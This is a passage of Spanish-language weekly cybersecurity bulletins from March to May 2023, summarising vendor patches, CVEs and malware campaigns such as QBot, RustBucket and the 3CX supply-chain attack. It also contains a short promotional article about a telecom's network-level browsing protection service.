consisten en una lectura fuera de los límites que permite a los actores de amenaza obtener acceso a información confidencial y lograr la ejecución de código arbitrario en dispositivos comprometidos. Los CVE fueron recientemente asignados, por lo que no se dispone de información detallada. Apple recomienda a todos los usuarios actualizar sus dispositivos a la última versión disponible. Más info → Foto de apertura: Jonathan Kemper / Unsplash.
19 de mayo de 2023
Boletín semanal de Ciberseguridad, 6 – 12 de mayo
Actualizaciones de seguridad en productos Fortinet Fortinet ha anunciado un conjunto de actualizaciones de seguridad que corrigen hasta un total de 9 vulnerabilidades, 2 de las cuales son consideradas de alta gravedad y afectan a FortiADC, FortiOS y FortiProx. Por una parte, se encuentra el fallo de seguridad registrado como CVE-2023-27999 que afecta a las versiones 7.2.0, 7.1.1 y 7.1.0 de FortiADC. Un actor malicioso podría aprovechar este error a través de argumentos elaborados para los comandos existentes, lo que les permitiría ejecutar comandos no autorizados. Por otra parte, se encuentra la vulnerabilidad CVE-2023-22640, que surge de un error en el componente sslvpnd de las versiones 7.2.x, 7.0.x, 6.4.x, 6.2.x y 6.0.x de FortiOS y en las versiones 7.2.x, 7.0.x, 2.0.x y 1.xx de FortiProxy. En concreto, este error permite que un atacante autenticado envíe solicitudes especialmente diseñadas con el objetivo de realizar una ejecución de código arbitrario. Desde Fortinet se recomienda actualizar los activos a la última versión disponible para corregir dichos fallos. Más info → Intel investiga fuga de claves privadas tras incidente de MSI Recientemente, la compañía MSI confirmaba una brecha de datos sufrida en un incidente de seguridad que habría ocasionado la filtración de claves privadas afectando a numerosos dispositivos. A raíz de estos hechos, la compañía Intel está investigando una posible filtración de las claves privadas de Intel Boot Guard. Este activo se trata de una función de seguridad que protege el proceso de arranque del sistema operativo en los procesadores de Intel. En base a ello, actores maliciosos, mediante dicha filtración podrían desactivar la protección de Boot Guard en los sistemas afectados, lo que les permitiría insertar software malicioso en el proceso de arranque. El equipo de investigadores de Binarly han publicado una lista con el hardware de la compañía MSI afectado. Más info → Patch Tuesday de Microsoft incluye vulnerabilidades 0-day explotadas activamente En su última actualización de seguridad, Microsoft ha corregido un total de 38 vulnerabilidades que afectan a varios de sus productos entre los que se encuentran afectados Microsoft Windows, SharePoint u Office y de las cuales 6 han sido categorizadas como críticas y 32 como importantes. Entre todas ellas, destacan tres vulnerabilidades 0-day, de las cuales dos están siendo activamente explotadas. En concreto, se trata de las registradas como CVE-2023-29336, CVSSv3 de 7.8 según fabricante, siendo un fallo en el kernel Win32k que podría ser aprovechada por actores maliciosos con el objetivo de obtener privilegios de SYSTEM. Por otra parte, el fallo de seguridad registrado como CVE-2023-24932, CVSSv3 de 6.7 según fabricante, se trata de un fallo de omisión en el modo de arranque seguro que podría ser utilizado para instalar el software malicioso BlackLotus UEFI. En último lugar, cabe reseñar la última de las vulnerabilidades 0-day catalogada como CVE-2023-29325, CVSSv3 de 8.1 según fabricante, que si bien no ha sido activamente explotada se trata de una falla de seguridad en Windows OLE de Microsoft Outlook que puede explotarse mediante correos electrónicos especialmente diseñados y desencadenar en una ejecución de código remoto. Más info → SAP corrige 28 vulnerabilidades en su patch day de mayo SAP ha publicado 24 notas de seguridad, entre las que se incluyen un total de 28 vulnerabilidades, dos notas clasificadas como críticas y nueve de alta prioridad. En cuanto a la nota nº 3328495 considerada crítica al ser calificada con una puntuación CVSS de 9.8, corrige cinco vulnerabilidades en la versión 14.2 del componente Reprise License Manager (RLM) utilizado con SAP 3D Visual Enterprise License Manager. Por un lado, la identificada como CVE-2021-44151, permitiría a un atacante secuestrar la sesión a través de fuerza bruta. Por otro lado, la clasificada como CVE-2021-44152, podría derivar a que un usuario no autenticado cambie la contraseña de cualquier usuario, obteniendo acceso a su cuenta. La CVE-2021-44153 podría ser explotada para ejecutar un binario malicioso. La CVE-2021-44154, por su parte, podría causar un desbordamiento de búfer. Finalmente, la identificada como CVE-2021-44155, permitiría a un atacante enumerar usuarios válidos. Se recomienda actualizar SAP 3D Visual Entreprise License Manager a la v ersión 15.0.1-sap2, además de deshabilitar la interfaz web de RLM. En último lugar, la nº 3307833, con CVSS 9.1, incluye correcciones de fallos de divulgación de información para SAP BusinessObjects Business Intelligence Platform. Nuevos detalles acerca de la distribución de Amadey y Redline Stealer McAfee Labs ha publicado un análisis acerca del ejecutable malicioso con el que se distribuyen varios tipos de malware como Amadey y Redline Stealer. Su nombre original es wextract.exe.mui y, dentro de este, se encuentra un archivo CAB, que contiene un atributo denominado RUNPROGRAM, utilizado para iniciar cydn.exe, el cual contiene otros dos ejecutables, aydx.exe y mika.exe, que son desplegados como malware. Por otro lado, hay otro atributo, POSTRUNPROGRAM, que contiene una instrucción para ejecutar vona.exe. Todos estos ejecutables se ubican en la carpeta TEMP como archivos temporales, y se vinculan, junto con otros ejecutables de sus procesos secundarios con Redline Stealer y Amadey, además de desactivar los mecanismos de seguridad. Más info → Foto de apertura: Freepik.
12 de mayo de 2023
Boletín semanal de Ciberseguridad, 29 de abril – 5 de mayo
Vulnerabilidad crítica en los firewalls Zyxel El fabricante de equipos de red Zyxel ha publicado parches de seguridad para una vulnerabilidad crítica que afecta a sus firewalls. La vulnerabilidad, que fue descubierta y reportada por el equipo de TRAPA Security, ha sido clasificada como CVE-2023-28771 y con CVSS de 9.8. Permite que un atacante no autenticado ejecute algunos comandos del sistema operativo de forma remota mediante el envío de paquetes manipulados a un dispositivo afectado. El fallo de seguridad afecta a las versiones de firmware de ATP (ZLD V4.60 a V5.35, parcheado en ZLD V5.36); USG FLEX (ZLD V4.60 a V5.35, parcheado en ZLD V5.36) VPN (ZLD V4.60 a V5.35, parcheado en ZLD V5.36), ZyWALL/USG (ZLD V4.60 a V4.73, parcheado en ZLD V4.73). Hasta el momento, no se conoce que la vulnerabilidad haya sido explotada; sin embargo, Zyxel recomienda que se actualicen los firewalls a la última versión disponible. Más info → Google lanza Chrome 113 con 15 actualizaciones de seguridad Google ha lanzado al canal estable la versión 113 de Google Chrome para Windows, macOS y Linux, en la cual se solventan hasta 15 vulnerabilidades, 10 de ellas reportadas a Google a través de su programa bug bounty. Ninguna de las vulnerabilidades ahora solucionadas es de alta criticidad, siendo la más relevante la catalogada como CVE-2023-2459, aún sin CVSS, pero por la que Google ha pagado 7,500 dólares al investigador Rong Jian. Se trata de un problema de implementación inapropiada en Prompts, su gravedad se considera media y permitiría a un atacante remoto eludir las restricciones de permisos a través de una página HTML manipulada. Esta última iteración del navegador ahora se implementa como la versión 113.0.5672.63 de Chrome para Linux y macOS, y como las versiones 113.0.5672.63/.64 de Chrome para Windows. Más info → Vulnerabilidades en el protocolo BGP permiten a los atacantes realizar ataques DoS Investigadores de Forescout Vedere Labs han publicado un informe que detalla nuevas vulnerabilidades en el protocolo BGP. Las vulnerabilidades, ya parcheadas y con un CVSS de 6.5, han sido clasificadas como CVE-2022-40302, CVE-2022-40318 y CVE-2022-43681. Los fallos estarían relacionados con el análisis sintáctico de mensajes BGP encontrados en la implementación FRRouting que podrían ser explotados para lograr una denegación de servicio en peers BGP vulnerables. La condición de DoS puede prolongarse indefinidamente mediante el envío repetido de paquetes maliciosos. Cabe destacar que dos de estos problemas (CVE-2022-40302 y CVE-2022-43681) pueden activarse antes de que FRRouting valide los campos BGP Identifier y ASN. Más info → Vulnerabilidad crítica en adaptadores telefónicos de Cisco La compañía Cisco ha emitido un aviso de seguridad en el que alerta sobre una vulnerabilidad crítica en adaptadores de teléfonos de dos puertos Cisco SPA112. En concreto, el fallo de seguridad ha sido registrado como CVE-2023-20126, CVSSv3 de 9.8, y se debe a un fallo en el proceso de autenticación dentro de la función de actualización del firmware. El aprovechamiento de esta vulnerabilidad podría permitir que un atacante ejecute código arbitrario en el dispositivo afectado con todos los privilegios, y, consecuentemente, podría ayudar a un actor amenaza a moverse lateralmente en una red. No obstante, se estima que la mayoría de estos no estén expuestos a internet, lo que hace que estas fallas sean susceptibles de ser explotadas desde la red local. En último lugar, cabe indicar que desde Cisco han indicado que el modelo afectado llegó al final de su vida útil, por ello que no recibirá ninguna actualización de seguridad y recomiendan reemplazar dicho adaptador al modelo de la serie ATA 190. Más info → Fleckpe: nuevo malware de Android que suscribe a las víctimas a servicios premium Securelist ha encontrado un nuevo malware para Android llamado Fleckpe divulgado a través de, al menos, 11 aplicaciones disponibles en Google Play que acumulan en conjunto más de 620.000 descargas. En concreto, Fleckpe suscribe a las víctimas, sin su permiso, en diferentes servicios premium con tarificación especial, que entregan parte de la recaudación a los actores de la amenaza. Según Securelist, Fleckpe lleva activo desde 2022 y se ha difundido a través de 11 aplicaciones (ya eliminadas del market por Google), la mayoría editores de imágenes. Fleckpe funciona recibiendo del C2 la URL donde debe suscribir a la víctima, la abre en modo invisible y copia el código de confirmación de las notificaciones. Una vez completado el proceso, la app funciona con normalidad, evitando así levantar sospechas por parte de la víctima. Más info →
5 de mayo de 2023
Boletín semanal de Ciberseguridad, 22 – 28 de abril
SolarWinds corrige vulnerabilidades de alta gravedad En su última actualización de seguridad, SolarWinds ha corregido un total de 2 vulnerabilidades de alta gravedad, las cuales podrían conducir a la ejecución de comandos y la escalada de privilegios. La más grave de las dos vulnerabilidades es CVE-2022-36963 (CVSS de 8.8), que se describe como un fallo de inyección de comandos en la solución de monitorización y gestión de infraestructuras de SolarWinds. La segunda vulnerabilidad de alta gravedad es CVE-2022-47505 (CVSS de 7.8), que hace referencia a un fallo de escalada de privilegios local. Ambas vulnerabilidades fueron notificadas por investigadores de la Trend Micro Zero Day Initiative y se solucionaron con la versión 2023.2 de SolarWinds. Además, con la nueva versión también se resuelve la CVE-2022-47509, de gravedad media, que podría ser explotada de forma remota para añadir parámetros de URL e inyectar código HTML. Finalmente, SolarWinds corrigió dos vulnerabilidades de gravedad media en Database Performance Analyzer, que conducían a la divulgación de información confidencial y que permitían a los usuarios enumerar en diferentes carpetas del servidor, respectivamente. Más info → RustBucket: Nuevo malware contra usuarios macOS Investigadores de Jamf Threat Labs han descubierto una nueva familia de malware dirigida contra usuarios de macOS en ataques recientes que es capaz de obtener cargas útiles adicionales de su servidor de comando y control (C&C). Dicho malware, denominado RustBucket, se ha atribuido al actor de amenazas persistentes avanzadas (APT) asociado a Corea del Norte BlueNoroff, que se cree que es un subgrupo del del conocido Grupo Lazarus. RustBucket se ejecuta en tres etapas. En la primera utilizan dominios fraudulentos y técnicas de ingeniería social, además de una aplicación sin firmar llamada Internal PDF Viewer.app que está diseñada para obtener y ejecutar la carga útil de etapa dos en el sistema. La segunda etapa consiste en una aplicación firmada que se hace pasar por un identificador de paquete legítimo de Apple; una vez más el malware comienza a comunicarse con el servidor de comando y control (C&C) para obtener la carga útil de la etapa tres, que es un troyano firmado escrito en el lenguaje Rust que puede ejecutarse en arquitecturas ARM y x86, recopilar información del sistema, incluida una lista de procesos en ejecución, identificar si se está ejecutando en una máquina virtual, y además, permite al atacante realizar varias acciones en las máquinas infectadas. Más info → Vulnerabilidades críticas en Cisco Industrial Network Director y Modeling Labs Cisco ha publicado actualizaciones de seguridad para parchear dos vulnerabilidades críticas en sus productos Industrial Network Director y Modeling Labs. La primera de las vulnerabilidades es la catalogada como CVE-2023-20036, que tiene un CVSS de 9.9, y que trata de un problema en la interfaz web de Industrial Network Director que permitiría a un atacante autenticado en el sistema modificar una petición para ejecutar comandos con privilegios administrativos o acceder a datos confidenciales. La segunda vulnerabilidad es CVE-2023-20154, tiene un CVSS de 9.1 y reside en el mecanismo de autenticación externa de Cisco Modeling Labs, que podría permitir que un atacante remoto no autenticado acceda a la interfaz web con privilegios administrativos. Esta última afectaría a los productos configurados con autenticación LDAP. Más info → Google recibe autorización legal para actuar contra CryptBot Tras la autorización emitida por un juez federal del Distrito Sur de Nueva York sobre la acción civil contra los operadores del malware CryptBot, Google ha comenzado a desactivar la infraestructura relacionada con su distribución. La denuncia se dirigiría a los mayores distribuidores de CryptBot, supuestamente geolocalizados en Pakistán, y su contenido se basaría en acusaciones de fraude electrónico y violación de propiedad intelectual. La compañía estima que este malware habría infectado más de 670.000 equipos informáticos en el último año, dirigido contra usuarios de Google Chrome para exfiltrar sus datos. Para evitar la expansión de este malware, el tribunal ha emitido una orden temporal que permitiría a Google actuar contra dominios, actuales y futuros, vinculados a la distribución de CryptBot. Más info → Ransomware RTM Locker apunta a sistemas Linux El equipo de investigadores de Uptycs ha identificado una nueva cepa del ransomware RTM Locker dirigida contra sistemas operativos Linux. Cabe destacar que investigadores de seguridad de Trellix publicaban recientemente un análisis sobre las TTPs empleadas por el grupo Read The Manual (RTM), proveedor de Ransomware as a Service (RaaS). Sin embargo, su desarrollo ha continuado evolucionando desde entonces hasta identificar esta nueva cepa, la cual infecta hosts Linux, NAS y ESXi y se basa en el código fuente filtrado del ransomware Babuk. Asimismo, se caracteriza por utilizar una combinación de ECDH en Curve25519 y Chacha20 para cifrar archivos, para posteriormente instar a las víctimas a que se comuniquen con el equipo de soporte dentro de las 48 horas a través de Tox o se amenaza con publicar los datos si no se aceptan sus exigencias. En último lugar, cabe mencionar que, según los investigadores, dicho actor amenaza se caracteriza por evitar objetivos de alto perfil como infraestructura crítica y hospitales entre otros, para evitar llamar la atención en la medida de lo posible. Más info →
28 de abril de 2023
Conexión Segura también para la Web 3 y el metaverso
Por Eduardo S. de la Fuente Product Manager de Telefónica Tech Cyber Security & Cloud Durante el pasado MWC, Telefónica presentó su visión sobre el metaverso junto con algunas iniciativas que está trabajando en este novedoso y estratégico espacio que, sin embargo, también supone nuevos retos. Desde Telefónica Tech abordamos estos nuevos desafíos, incluyendo también mejorar la seguridad de los usuarios a través de nuestro servicio Conexión Segura, presente en más de 300.000 hogares que tienen contratado paquetes Fusión y Mi Movistar y han activado este servicio. Qué es Conexión Segura Conexión Segura es un servicio que protege la navegación del usuario. Lo hace directamente desde la primera línea de defensa, la red, sin necesidad de instalar aplicaciones adicionales. Sin embargo, con el advenimiento de la Web3 y el metaverso, se materializan un nuevo tipo de amenazas para los que se necesita una nueva inteligencia de protección. Para abordar estos retos y desafíos en materia de Ciberseguridad, estamos colaborando con las áreas corporativas de Telefónica en ampliar la seguridad a este nuevo ámbito de internet. Con este propósito hemos dotado a Conexión Segura (en modo beta) de una inteligencia de amenazas específica que incrementa la seguridad en la navegación de nuestros clientes con intereses en la Web3 y el metaverso. AI OF THINGS El metaverso será para las empresas un medio, no un fin 20 de junio de 2022 Las nuevas amenazas en el ecosistema Web3 Ejemplo de este tipo de nuevas amenazas pueden ser los criptominers, programas que se instalan cual virus en los ordenadores y dedican sus recursos —incluyendo el consumo de energía eléctrica y su capacidad de procesamiento— para minar criptomonedas sin el conocimiento ni el consetimiento de su propietario. Otro ejemplo muy conocido de amenaza en el ecosistema Web3 es el de los fake brokers: timadores que, aprovechando el aura mágica de las criptomonedas, buscan enriquecerse ilícitamente mediante ciberestafas a costa de la falta de conocimiento del público en general en este ámbito. Una protección trasparente que filtra millones de amenazas cada año Como decíamos, Conexión Segura protege la navegación por internet de los usuarios que hacen uso de las redes Movistar sin necesidad de instalar y configurar aplicaciones adicionales en tus dispositivos. Conexión Segura alerta de los sitios web sospechosos y con potencial de riesgo sin que tengas que hacer nada. Su funcionamiento es totalmente transparente para el usuario: bloquea al instante las amenazas de malware y phishing que detecta por sí mismo. Para que los usuarios, de cualquier nivel de conocimiento y edad, puedan disfrutar de una navegación más segura tanto en el móvil como en el ordenador, en casa o fuera de ella. Con 270 millones de amenazas filtradas solo el último año, da igual quien haga uso de internet y desde dónde esté conectado, ya que nuestra solución Conexión Segura se encarga de eliminar los riesgos convencionales y también los nuevos.
27 de abril de 2023
Boletín semanal de Ciberseguridad, 15 – 21 de abril
Google corrige nuevas 0-day activamente explotadas Durante los últimos días, Google ha emitido nuevos avisos de seguridad sobre la identificación de vulnerabilidades 0-day que afectan al navegador Chrome y que están siendo activamente explotadas. La compañía informaba a sus usuarios sobre una vulnerabilidad 0-day, en concreto, el fallo de seguridad ha sido registrado como CVE-2023-2033, y se debe a un fallo en el motor de JavaScript Chrome V8 que podría permitir a un actor malicioso de forma remota explotar la vulnerabilidad a través de una página HTML especialmente diseñada. También Google advertía sobre otro fallo, esta vez registrado como CVE-2023-2136, el cual se encuentra en la librería multiplataforma de gráficos 2D, Skia y, de ser explotada podría llevar a un renderizado incorrecto de los gráficos, corrupción de memoria o ejecución remota de código que termine en un acceso no autorizado al sistema. Más info → Encontradas muestras de LockBit dirigidas contra sistemas macOS MalwareHunterTeam ha encontrado una muestra de un archivo de LockBit que contiene la capacidad de infectar numerosos sistemas operativos, incluyendo por primera vez, macOS de Apple. MalwareHunterTeam resalta que se trata de un hito remarcable pues también es la primera vez que se tiene conocimiento de uno de los grandes grupos de ransomware creando un malware dirigido específicamente a macOS. El archivo encontrado incluye un cifrador llamado ‘locker_Apple_M1_64’, para los dispositivos de Apple más recientes y otro para PowerPC CPUs, usado por los macOS más antiguos. Un análisis en profundidad del archivo muestra que, por el momento, se trata de una versión inicial de esta cepa de LockBit y que no podría usarse en un ataque real, pero muestra el interés de este ransomware en atacar dispositivos macOS en un futuro próximo. Más info → Identificada nueva campaña de QBot Investigadores de seguridad han publicado un análisis sobre las TTPs empleadas en una nueva campaña del ya conocido malware Qbot, el cuál ahora infectaría a sus víctimas mediante el uso de archivos PDF y Windows Script Files (WSF). Esta campaña de phishing se distribuye mediante emails que emplean hilos de correo legítimos y contienen un archivo PDF adjunto que, cuando se abre, se descargará un archivo ZIP que contiene un archivo WSF. Este archivo tiene como objetivo final ejecutar un script en PowerShell, con el que se trata de descargar una DLL de QBot. Cabe destacar que numerosos actores como BlackBasta, REvil, PwndLocker, Egregor, ProLock y MegaCortex han utilizado Qbot para el acceso inicial a las redes corporativas. Este acceso inicial se realiza desplegando payloads adicionales como Cobalt Strike, Brute Ratel y otros malware que permiten a acceder al dispositivo vulnerado. Más info → Nueva PoC permite realizar bypass en VM2 sandbox Investigadores de seguridad han publicado una nueva PoC capaz de realizar bypass en VM2 sandbox, ampliamente utilizada en el mundo del desarrollo y la seguridad para ejecutar y probar código que no es de confianza en un entorno aislado. Este bypass permitiría ejecutar malware fuera de las limitaciones del entorno sandbox. La primera vulnerabilidad fue identificada como CVE-2023-29017 hace dos semanas, y las dos últimas identificadas como CVE-2023-29199 y CVE-2023-30547. Esta última vulnerabilidad, con un CVSS de 9.8, puede ser aprovechada por actores maliciosos debido a un fallo de sanitización que permite al atacante lanzar una excepción de host dentro de “handleException()”. Se recomienda a los usuarios que para corregir la vulnerabilidad actualicen a la versión 3.9.17 lo antes posible para evitar un posible incidente de seguridad. Más info → Vulnerabilidades críticas en las bases de datos PostgreSQL de Alibaba Cloud Investigadores de seguridad de Wiz han publicado un artículo en el que revelan dos vulnerabilidades críticas en las bases de datos PostgreSQL de Alibaba Cloud. Según los investigadores, estos fallos permitían el acceso no autorizado a las bases de datos PostgreSQL de los clientes de Alibaba Cloud, lo que podría derivar en un ataque a la cadena de suministro y en una ejecución remota de código. Cabe destacar que, las vulnerabilidades que han recibido el nombre de BrokenSesame, se comunicaron a Alibaba Cloud en diciembre de 2022, quienes desplegaron mitigaciones el pasado 12 de abril, si bien, no hay evidencias de explotación. En conclusión, se trataría de un fallo que permitiría la escalada de privilegios en AnalyticDB y otro de ejecución remota de código en ApsaraDB RDS. Más info → Foto principal: Clark van der Beken / Unsplash
21 de abril de 2023
Boletín semanal de Ciberseguridad, 8 – 14 de abril
Apple corrige dos nuevas 0-day activamente explotadas La compañía Apple ha lanzado nuevos avisos de seguridad en los que aborda dos nuevas vulnerabilidades 0-day activamente explotadas que afectan a sus dispositivos iPhones, Macs e iPads. En primer lugar, se encuentra el fallo de seguridad registrado como CVE-2023-28206, el cual es una escritura fuera de los límites de IOSurfaceAccelerator que podría desencadenar en la corrupción de datos, un bloqueo o la ejecución de código. En segundo lugar, la vulnerabilidad asignada como CVE-2023-28205 es un uso de WebKit cuyo aprovechamiento podría permitir la corrupción de datos o la ejecución de código arbitrario al reutilizar la memoria liberada mediante la creación de páginas web maliciosas especialmente diseñadas controladas por actores maliciosos. Desde Apple recomiendan actualizar el software de los dispositivos afectados para corregir las dos vulnerabilidades 0-day en sus versiones iOS 16.4.1, iPadOS 16.4.1, macOS Ventura 13.3.1 y Safari 16.4.1. Más info → * * * Patch Tuesday de Microsoft incluye una 0-day activamente explotada En su última actualización de seguridad, Microsoft ha corregido un total de 98 vulnerabilidades que afectan a varios de sus productos entre los que se encuentran afectados Microsoft Windows, Office o Edge. Entre todas ellas destaca una vulnerabilidad 0-day activamente explotada la cual ha sido registrada como CVE-2023-28252, CVSSv3 de 7.8 según fabricante, siendo un fallo de CLFS que podría ser aprovechada de forma local por actores maliciosos con el objetivo de obtener privilegios de SYSTEM. Por otra parte, cabe mencionar el resto de fallos de seguridad críticos, los cuales han sido registrados como CVE-2023-28311, CVE-2023-21554 y CVE-2023-28231, CVE-2023-28219, CVE-2023-28220, CVE-2023-28250, CVE-2023-28291. En último lugar, cabe destacar, aunque posean una menor criticidad que el resto, las vulnerabilidades CVE-2023-28285, CVE-2023-28295, CVE-2023-28287 y CVE-2023-28311 que si bien no se están explotando activamente, estas podrían ser explotadas fácilmente al abrir documentos maliciosos remitidos en posibles futuras campañas de phishing. Más info → * * * Quadreams acusada de emplear spyware contra figuras políticas y periodistas Investigadores de CitizenLab junto al equipo de Threat Intelligence de Microsoft han publicado una investigación acerca de la compañía israelí QuaDreams, a quien acusan de emplear spyware contra periodistas y figuras políticas. La actividad de la empresa de basaría en la venta y distribución de una plataforma denominada Reign a entidades gubernamentales, a la que Microsoft describe como un conjunto de exploits, malware e infraestructura diseñado para exfiltrar información de dispositivos móviles. De las técnicas empleadas para su funcionamiento destaca lo que los investigadores sospechan que es un exploit zero-click para dispositivos iOS, al que han denominado ENDOFDAYS, que haría uso de invitaciones invisibles de iCloud. El análisis habría identificado al menos cinco víctimas, que por ahora continúan siendo anónimas, en Norteamérica, Asia central, el Sudeste Asiático, Europa y Oriente Medio. Más info → * * * Boletín de seguridad de Android de abril Android ha publicado su boletín de seguridad para el mes de abril donde corrige un total de 68 vulnerabilidades. De entre las vulnerabilidades destacan dos detectadas en el componente System, las cuales han sido catalogadas como CVE-2023-21085 y CVE-2023-21096, ambas con severidad crítica, y que podrían permitir a un posible atacante la ejecución remota de código (RCE) sin necesidad de privilegios de ejecución adicionales. Asimismo, también han sido catalogadas como críticas cuatro vulnerabilidades en el componente de código cerrado de Qualcomm: CVE-2022-33231, CVE-2022-33288, CVE-2022-33289 y CVE-2022-33302. Por último, cabe destacar que también se ha corregido una vulnerabilidad en el controlador del núcleo GPU Arm Mali, CVE-2022-38181 CVSSv3 8.8, suya explotación activa se habría detectado. Más info → * * * Descubierto un error de diseño en Azure que permite tomar el control de cuentas Una investigación de Orca ha demostrado la existencia de un error de diseño en Microsoft Azure Shared Key que permitiría a un atacante obtener acceso a las cuentas de almacenamiento de Microsoft Storage. Aunque Orca ha publicado una prueba de concepto en la que demuestra cómo se puede robar tokens de acceso de identidades con privilegios más altos, moverse lateralmente, acceder a activos comerciales críticos y ejecutar código remoto (RCE), el Security Response Center de Microsoft ha considerado el problema como un fallo de diseño y no una vulnerabilidad, por lo que no puede ofrecer una actualización de seguridad y habrá que esperar a un rediseño de Azure. Mientras tanto, se recomienda eliminar la autorización de clave compartida de Azure y, en su lugar, adoptar la autenticación de Azure Active Directory como estrategia de mitigación. Más info →
14 de abril de 2023
Boletín semanal de Ciberseguridad, 25 – 31 de marzo
GitHub expone su clave de host RSA SSH por error GitHub anunció el pasado viernes que habían reemplazado su clave de host RSA SSH utilizada para proteger las operaciones de Git. Según la compañía, la semana pasada esta clave fue expuesta accidentalmente en un repositorio público de GitHub, tras lo cual se actuó rápidamente para contener la exposición y se dio comienzo a una investigación para descubrir la causa y el impacto. Si bien esta clave no da acceso a la infraestructura de GitHub ni a los datos de los usuarios, esta medida se ha tomado para evitar posibles suplantaciones. Se recomienda a los usuarios eliminar la clave y sustituirla por la nueva. Más info → * * * Apple corrige un 0-day explotado activamente Apple ha lanzado actualizaciones de seguridad en los que se corrige una vulnerabilidad 0-day explotada activamente en iPhone, macOS y iPad antiguos. El fallo, identificado como CVE-2023-23529, es un error de confusión de tipo WebKit, que cuenta con un CVSS de 8.8 y que podría dar lugar a la ejecución de código arbitrario, robo de datos, acceso a los datos de Bluetooth, etc. Cabe destacar que, en cuanto a los dispositivos, la vulnerabilidad afecta a iPhone 6s, iPhone 7, iPhone SE, iPad Air 2, iPad mini y iPod touch, además de Safari 16.3 en macOS Big Sur y Monterey, macOs Ventura, tvOS y watchOS. La compañía recomienda actualizar lo antes posible para evitar posibles intentos de explotación. Más info → * * * Campaña maliciosa suplantando al Gobierno de España y entidades bancarias La Oficina de Seguridad del Internauta (OSI) ha emitido un aviso de seguridad en el que informa sobre una campaña maliciosa de smishing suplantando a organismos gubernamentales y entidades bancarias. En concreto, actores maliciosos están empleando técnicas de ingeniería social mediante la remisión de campañas de smishing en las que se pretende engañar a la víctima de que dispone de un reembolso debido a la campaña de impuestos. En caso de que la víctima acceda al enlace malicioso esta accederá a un sitio web que simula ser la web de La Moncloa, en la que se solicita indicar a qué entidad bancaria pertenece, la cual una vez se seleccione, la víctima será nuevamente redirigida a un phishing que suplanta el nombre y logo del banco seleccionado. El objetivo por parte de actores maliciosos tras esta campaña consiste en la exfiltración de credenciales bancarias de sus víctimas. Más info → * * * Ataque a la cadena de suministro mediante la plataforma de videoconferencia 3XC Investigadores de diversas firmas de seguridad como SentinelOne, Sophos y CrowdStrike han alertado de un ataque a la cadena de suministro a través del programa de videoconferencias 3CX. Si bien la investigación del ataque sigue en curso, se habría confirmado su afectación para plataformas Windows donde la aplicación 3CXDesktopApp comprometida descargaría archivos ICO desde GitHub llevando finalmente a la instalación de un malware de tipo stealer. Las primeras detecciones de comportamientos sospechosos de la aplicación en soluciones de seguridad se habrían dado a mediados del presente mes de marzo de 2023, pero los investigadores habrían identificado infraestructura empleada en el ataque con fechas de registro en febrero del año pasado. La campaña, a la que SentinelOne ha denominado SmoothOperator, no tendría una atribución clara, si bien algunos investigadores señalan a posibles conexiones con Labyrinth Chollima, parte del grupo norcoreano Lazarus Group. 3CX no ha realizado ninguna declaración al respecto de la campaña. Más info → * * * Análisis sobre campañas aprovechando 0-days en Android, iOS y Chrome El Threat Analysis Group de Google ha publicado un informe en el que comparten detalles acerca de dos campañas en las que se utilizaron exploits 0-day contra Android, iOS y Chrome. En cuanto a la primera campaña, se detectaron cadenas de exploits 0-days dirigidos a Android e iOS, que se distribuían mediante enlaces acortados enviados por SMS a usuarios localizados en Italia, Malasia y Kazajstán. La vulnerabilidad, ya corregida en 2022, que afectaba en iOS en versiones anteriores a la 15.1, es la identificada como CVE-2022-42856 y CVSS 8.8, la cual hace referencia un error de confusión de tipos del compilador JIT que puede dar lugar a la ejecución de código arbitrario. Por otro lado, la identificada como CVE-2021-30900, con CVSS 7.8, también corregida, trata sobre un error de escritura fuera de los límites y escalada de privilegios. En cuanto a la cadena de exploits de Android, estos se dirigían a los usuarios de teléfonos con una GPU ARM que ejecutaba versiones anteriores a la 106. En cuanto a los fallos, todos corregidos, uno de ellos es el CVE-2022-3723 (CVSS 8.8), de confusión de tipos en Chrome; el CVE-2022-4135 (CVSS 9.6), desbordamiento de búfer en la GPU de Chrome y el CVE-2022-38181 (CVSS 8.8), de escalada de privilegios. Cabe destacar que de esta última vulnerabilidad se detectó su explotación activa. La segunda campaña, dirigida por SMS a dispositivos de Emiratos Árabes Unidos, consta de varios 0-day y n-day dirigidos al navegador de Internet de Samsung. El enlace redirige a los usuarios a una página desarrollada por el proveedor de spyware Variston y explota las vulnerabilidades CVE-2022-4262, CVE-2022-3038, CVE-2022-22706 y CVE-2023-0266. Más info →
31 de marzo de 2023
Boletín semanal de Ciberseguridad, 18 – 24 de marzo
HinataBot: nueva botnet dedicada a ataques de DDoS El equipo de investigadores de Akamai ha publicado un informe en el que señala que han identificado una nueva botnet denominada HinataBot que dispondría de la capacidad de realizar ataques de DDoS de más de 3,3 TB/s. Los expertos han indicado que dicho software malicioso fue descubierto a mediados del pasado mes de enero, mientras se distribuía en honeypots HTTP y SSH de la compañía. En concreto, HinataBot utiliza credenciales exfiltradas de usuarios para infectar a sus víctimas y explota vulnerabilidades antiguas de dispositivos Realtek SDK, CVE-2014-8361, routers Huawei HG532, CVE-2017-17215, y/o servidores Hadoop YARN expuestos. Posteriormente, una vez infectados los dispositivos, el malware se ejecuta y se mantendrá a la espera de que el servidor de Command & Control remita las órdenes. Desde Akamai alertan que HinataBot aún está en desarrollo y que podría implementar más exploits, y, por ende, ampliar su vector de entrada a más víctimas además de aumentar sus capacidades para realizar ataques con un mayor impacto. Más info → * * * La CISA emite ocho avisos de seguridad en sistemas de control industrial Recientemente, CISA ha publicado hasta un total de ocho avisos de seguridad alertando sobre vulnerabilidades críticas en sistemas de control industrial. En relación a estas nuevas vulnerabilidades, cabe destacar que afectan a varios productos de diferentes compañías como Siemens, Rockwell Automation, Delta Electronics, VISAM, Hitachi Energy y Keysight Technologies. De entre todas ellas, destacan por su volumen las que afectan a la marca Siemens, de la cual se han recogido tres avisos que afectan a sus activos SCALANCE W-700, dispositivos RADIUS client of SIPROTEC 5 y la familia de productos RUGGEDCOM APE1808 con hasta un total de 25 vulnerabilidades cuyo CVSSv3 oscila entre 4.1 y 8.2 de puntuación. Consecuentemente, debido a su impacto, destacan los avisos del equipamiento ThinManager ThinServer de Rockwell Automation, cuya criticidad de uno de sus tres fallos alcanza un CVSSv3 de 9.8, al igual que el activo InfraSuite Device Master de Delta Electronics, de la cual se han recogido hasta un total de 13 vulnerabilidades. Más info → * * * Mispadu: troyano bancario centrado en América Latina Investigadores de Metabase Q Team han publicado un informe sobre la actual campaña que se está desarrollando en países de América Latina contra usuarios bancarios y que se sirve del troyano Mispadu. Según 